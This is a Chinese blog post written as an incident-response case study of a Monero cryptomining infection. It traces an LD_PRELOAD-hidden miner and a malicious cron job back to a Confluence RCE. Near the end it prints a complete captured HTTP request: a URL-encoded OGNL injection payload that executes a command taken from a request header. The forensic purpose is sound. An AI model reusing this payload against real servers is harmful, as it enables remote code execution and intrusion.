警告,恶意域名疯狂外联,原因竟然是……

最新推荐文章于 2024-07-02 12:06:30 发布
最新推荐文章于 2024-07-02 12:06:30 发布
阅读量908 收藏 18
点赞数 20
分类专栏: 安全服务 应急响应 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Enlink_Young/article/details/139913149
版权

afdf7e15d719d7da4e5991ce69f87fee.jpeg


前言

  

在某个风和日丽的下午,突然收到客户那边运维发过来的消息说我司的DTA设备在疯狂告警,说存在恶意域名外联,我急忙背上小背包前往客户现场,经过与客户协同排查,最终确定该事件为一起挖矿病毒引起的恶意域名外联事件。(因客户信息保密且为了保证文章逻辑完整性,部分截图为后期追加图)

104008f14a7387f6ad5e9eb83a0e8e7f.jpeg

事件分析


1e5d9a48b2155be5e2f48e884ae7d903.jpeg
一看域名地址donate.v2.xmrig.com,xmrig这不门罗币的矿池地址吗,看来是个挖矿事件,从DTA上的告警时间和告警事件来看,确实是个挖矿事件。 经过在DTA产品上分析发现该IP的流量信息,发现该IP主机一直在对该恶意域名进行外联请求,经过和客户沟通之后,对被害主机进行上机排查。执行top命令并未发现存在CPU异常,执行ps命令也未发现恶意进程,netstat命令也未发现恶意ip连接等行为。    d4485ab7b36028bb3301bf388c6dc04b.jpeg 但是在DTA上,该台主机确实一直在请求恶意域名,应该是做了一些隐藏进程的手段,现在类似这种挖矿病毒存在一种主流的隐藏方法,那就是通过LD_PRELOAD来修改运行链接库,修改LD_PRELOAD之后允许在你的程序运行前加载所修改的动态链接库。 那去/etc目录下看看是否存在ld.so.preload这个文件 a904ae5b80d1dbcba8749522d3c99aa0.jpeg 用系统的自带的ls命令并未发现ld.so.preload文件,这里怀疑是一些系统自带的ls等命令已经被动态链接库所hook劫持了,导致查看不到文件,所以上传了一个busybox,不用系统自带的命令来进行查看。 6daf66cad690751b41d483bce0cb321f.jpeg ld.so.preload这个文件,在系统中默认不存在这个文件或者该文件为空 这里直接通过busybox把这个文件给进行删除 fa98d793e2da3ab68eeba31d9ab036b7.jpeg 然后再次使用top命令进行查看 592eb340ecb37ed1c09d1a1af24e5eaf.jpeg 执行lsof -p [pid]命令来定位挖矿木马进程文件 6286434affe30cb29512d0e0f83c50c3.jpeg     来到该目录下发现如下 33c242831f7754ce9cfad64f4343ca7e.jpeg kill -9 3582558去kill掉挖矿木马进程,然后再把挖矿木马一并删除,但是一段时间后,DTA设备上又传来了失陷告警,且该目录下又重新生成了挖矿程序。 使用crontab -l 检查定时任务,发现一个可疑定时程序,该定时执行一个a.sh文件 427d98873cb5da2fb0b5c102f9c4566a.jpeg 该脚本主要内容如下     3794ff0716474949cf1845b61c46c705.jpeg 定义环境变量用来存取配置文件,然后检查ddns.log文件是否存在,这里的逻辑是检查当前时间与文件最后修改时间的差值。如果这个差值大于 6 秒,脚本输出 "process is not running",表示进程可能已经停止运行。如果差值不超过 6 秒,脚本认为进程可能仍在运行。最后根据不同用户来curl不用的sh文件,ai.sh一些关键代码如下 db7f0c4ec2c693ef663d0e2f4c080442.jpeg 杀死大于CPU使用率超过65%的所有进程,防止一些其他挖矿程序或者其他干扰CPU进程的运行 56b97acea1f0b1152de52ef5bde64d61.jpeg 下载的文件名和受害机上文件一致,且确定为挖矿程序。    ca5afd243b6a6561cedde9aef8b7505b.jpeg 对此删除掉恶意定时任务、挖矿病毒,重新kill进程,DTA恢复正常,无失陷流量告警。 挖矿病毒应急算是解决完了,要继续还原攻击者的攻击链路,根据挖矿木马可以分析出攻击者最先落地的是一个a.sh文件,根据a.sh文件名和落地时间和/var/log/messages里面所显示的脚本首次启动时间去查找日志,通过在态感、WAF、日志审计系统等设备再结合开放的端口服务结合查找,终于定位到一条如下攻击日志。

POST /pages/doenterpagevariables.action HTTP/1.1 Host: xxxxx:8090 Connection: keep-alive Content-Length: 599 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: xxxxxx Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: xxxxx cmd: 恶意命令 queryString=%5Cu0027%2B%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName%28%5Cu0022javax.script.ScriptEngineManager%5Cu0022%29.newInstance%28%29.getEngineByName%28%5Cu0022js%5Cu0022%29.eval%28%5Cu0022var+c%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getRequest%28%29.getHeader%28%5Cu0027cmd%5Cu0027%29%3Bvar+x%3Djava.lang.Runtime.getRuntime%28%29.exec%28c%29%3Bvar+out%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getResponse%28%29.getOutputStream%28%29%3Borg.apache.commons.io.IOUtils.copy%28x.getInputStream%28%29%2Cout%29%3Bout.flush%28%29%3B%5Cu0022%29%7D%2B%5Cu0027     通过再次复现验证 01ec47e4983090b6b087f1c0ce6494e5.jpeg 可以确认攻击者通过8090端口开放的Confluence应用(该版本的Confluence应用存在RCE漏洞)进行getshell,然后上传a.sh文件,最后上传挖矿木马进行挖矿操作。 至此整个攻击链路和应急流程已全部梳理完毕。



https://mp.weixin.qq.com/s/Bmh7RGYVGSGpbTNnLXdbvQ

零信任Enlink_Young
关注
专栏目录
域名基础】域名数据分析:良性域名恶意域名之间有哪些特征不一样?「持续更新」
vector的博客
04-12 1090
本篇博客将搜集域名检测论文中关注的**良性域名恶意域名之间有区分性的特征** 持续更新中!希望大家都能找到最适合的特征啊!!!😃😄😆
恶意域名解析
weixin_34397291的博客
06-15 749
原因 今天在使用搜狗搜索我们公司的网站名称的时候搜索到一个域名为:test99.cn的网站,打开直接弹出了我们的后台管理系统 后果 非法网站被工信部扫描到之后,将会影响到该主机客户的域名备案等信息,另外我们的后台管理系统就这样被暴露了.. 解决 首先,我们需要禁止掉这个域名能够访问我们的服务器,我是用的是nginx,可以在nginx的配置文件中添加如下配置 server { liste...
【定位恶意域名请求】
weixin_46356409的博客
01-10 1867
在DNS服务器没有开启日志存储的情况下,要确定哪台机器请求恶意域名会比较困难。但是,你可以尝试以下几种方法:网络嗅探工具:使用网络嗅探工具(如Wireshark)来捕获网络流量。通过分析捕获的数据包,可以找到发出恶意域名请求的IP地址。请确保在合适的网络位置部署嗅探工具,以便捕获到所有DNS请求。防火墙日志:检查防火墙日志,看是否有记录到DNS请求(通常是目标端口为53的UDP或TCP请求)。通过分析防火墙日志,可以找到发出恶意域名请求的IP地址。
恶意域名检测研究与应用综述
最新发布
k__opp的博客
07-02 880
它包含三级域名,在第三级域中,除字母“j”之外,从元音和辅音中随机交替的挑选字母,因此随后的字母总是来自其他字符类这样选取的字符组成的域名几乎是可读的。:王红凯等人提出了一种基于随机森林的随机域名检测方法,该方法通过人工提取的域名长度、域名字符信息熵分布、元音辅音比、有意义的字符比率等特征来构建随机森林模型进行训练和分类,实现对随机域名的检测。:随着僵尸网络变得更加复杂和智能化,现有的检测方法面临挑战,包括网络流的部分特征无法完全表征僵尸网络的异常行为,以及攻击者可能设计新的DGA算法来绕过某些固定特征。
毕业设计-基于对抗模型的恶意域名检测方法
Hai_Lang_IT的博客
03-28 454
毕业设计-基于对抗模型的恶意域名检测方法:互联网作为人类近代发展史上一个重要的里程碑,人类创新与智慧的象征,是科技 高速发展的重要标准。短短四十年的时间,它已经完全融入到军事、民用、商用等各 个领域。很大程度上改变了人们的生活方式、变革了社会的组织结构。 互联网从诞生之初便是一把双刃剑,随着互联网规模的不断扩大,网络出现异常和 遭受攻击的可能性将越来越大。同样伴随互联网技术的发展而来的黑客攻击技术也不断 更新换代。在互联网安全防范人员和黑客之间形成了道高一尺魔高一丈的局面。这对互 联网的稳定运行构成了严重的
解析:内联,左外联,右外联,全连接,交叉连接的区别
09-10
在数据库查询中,连接操作是将两个或多个表格的数据结合在一起的关键方法,使得我们可以从不同表格中获取相关信息。本文将详细解析五种不同的连接类型:内连接、左外连接、右外连接、全连接和交叉连接。...
sql.rar_sql外联查询
09-20
外联查询分为三种主要类型:左外联(LEFT JOIN)、右外联(RIGHT JOIN)和全外联(FULL OUTER JOIN),每种都有其独特的用途和特性。 首先,我们来了解一下**内联查询**(INNER JOIN)。这是最基础的联接类型,它...
浅谈js和css内联外联注意事项
11-24
简单说:这两个问题其实是同一个问题,但是网上找了好久也找不到方法,外联的js和css文件里不能有任何HTML的标记注释,一旦有,浏览器就疯了!一去掉就好了!!! 问题:起因是网上看到一个css的表格样式,觉得挺...
虚拟机外联连接器
12-11
这个moba可以与虚拟机很完美的结合,可以方便使用者通过该软件进行相连,同时老师使用起来也非常方便。
毕业设计-基于深度学习和相似度的恶意域名检测方法
Hai_Lang_IT的博客
03-30 660
毕业设计-基于深度学习和相似度的恶意域名检测方法:互联网的出现为人们的生活提供了极大的便利,各种文本信息、流媒体资源和文 件都可以通过互联网进行传播,这些传播于网络上的信息均可视为数据。在这些数据 中,有一部分是黑客进行恶意活动所使用的恶意数据。恶意流量和恶意软件与恶意数 据关系密切,恶意软件是指黑客在目标主机中植入的软件。通过对恶意软件下达指令, 可以达到控制目标主机的目的,这种被植入了恶意软件的主机被称为僵尸主机,数量 庞大的僵尸主机则可组成僵尸网络。黑客与僵尸主机通信的流量数据为恶意流量数据。 通过检
xmrig-6.2.2-msvc-win64_xmrig_msvc-win64_源码
10-02
xmrig version 6.2.2 windows binary
外网出口IP存在大量恶意域名访问,如何排查
vivlol918的博客
08-27 2196
以下工作场景中,发现外网出口IP存在大量恶意域名访问是一个严重的安全问题,需要及时排查和处理。
2024陇剑杯答题笔记(更新中),2024年最新网络安全权限处理
2401_83946044的博客
04-15 1017
检查Nginx日志(/var/log/nginx/access.log)中查看访问信息,可以在最后找到ua信息为Mozilla/5.0 (compatible;可能是开机自启,所以检查/root/lib/systemd/system/和/etc/systemd/system/,在/root/lib/systemd/system/中找到了redis.service文件。值得注意的是%27为。所以答案为/lib/systemd/system/redis.service,转换格式为。所以真正的后门文件为。
2023陇剑杯
qq_64201116的博客
09-18 1275
​首先判断哪个是服务器地址​从响应包看,给客户端返回数据包的就是服务器所以确定服务器地址是​再从开放端口来看,长期开放的端口​所以就是80、888、8888。
在没有配置的 DNS 服务器响应之后,名称 xxx 的名称解析超时。
热门推荐
zhjmyx的专栏
05-25 1万+
在这个警告的提示之后,接着有错误提示:Cluster Service 服务因 群集节点的仲裁不存在,无法形成群集。 服务特定错误而停止。 修改注册表: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet] EnableActiveProbing 值由 1 改为 0 。 再观察...
windows网络排查
weixin_43622525的博客
12-16 1005
排查恶意程序 netstat -ano | grep "LISTEN" 通过网络找进程,通过进程找文件。 打开任务管理器使用Ctrl+Alt+delete或者在windows下面状态栏右键选择任务管理器打开 通过点击详细信息,pid排序找到要找的pid来关闭恶意程序 查看windows路由表 route print netstat -rn win windows进程排查 tasklist打开进程信息或者taskmgr打开任务管理器 msinfo32查看系统信息 ...
Xmrig挖矿入侵服务器排查
BothSavage
03-19 1033
挖矿程序入侵
seci-log 1.02 发布,日志分析软件增加了多种告警
weixin_34319111的博客
08-16 149
我们在日志分析软件七种告警(非上班时间访问,非上班地点访问,密码猜测,账号猜测,账号猜测成功、敏感文件操作告警和高危命令操作)的基础上有增加了主机扫描,端口扫描,非法外联告警的内容。主机扫描主机扫描是指在一台机器上对内网或者外网一个网段进行扫描,目的是要发现网络中存活的主机,为下一步的操作打下基础。这条告警和下面的端口扫描和非法外联都属于网络层面的告警,前提也是需要配置日志策...
应急响应典型案例分析
glb111的博客
03-30 854
2022年1月,奇安信安服团队接到交通运输行业某客户应急响应求助,公司Exchange服务器出现发送恶意邮件行为,希望对该事件进行分析排查处理。应急人员抵达现场后对部署在外网的Exchange服务器进行排查,根据发送失败的恶意邮件内容,成功定位攻击源IP(x.x.x.114),通过威胁情报查询确认IP(x.x.x.114)为恶意IP。
SQL内联与外联查询:经典面试难题解析
在SQL语句的内联和外联查询中,理解集合操作是编程面试中的重要知识点。这些概念主要涉及到如何有效地处理数据库查询结果,以及在Java编程中迭代器的使用。 首先,让我们探讨SQL语句的内联查询(Inline Query)和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值